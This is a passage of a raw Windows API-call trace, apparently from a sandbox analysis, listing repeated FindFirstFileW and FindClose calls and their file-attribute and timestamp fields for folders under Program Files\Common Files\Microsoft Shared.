ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.525] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.525] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.525] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.525] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.527] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.527] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.527] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.527] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.527] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.527] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.528] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.528] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.528] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.528] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.528] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.529] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.529] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.529] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.529] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.529] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.531] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.531] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.531] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.531] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.531] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.532] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.532] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.532] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.532] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.532] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.533] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.533] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.533] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.533] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.534] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.534] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.535] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.535] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.535] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.535] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.536] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.536] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.536] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.536] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.536] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.537] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.537] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.537] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.538] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.538] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.538] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.538] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98074e3f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98074e3f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.539] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.539] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98074e3f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98074e3f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.540] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.540] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.540] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.540] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.540] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.541] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.542] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.542] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.542] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.542] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.543] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.543] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.543] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.543] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.543] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.543] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.544] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.544] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.544] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.544] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.545] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.545] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, 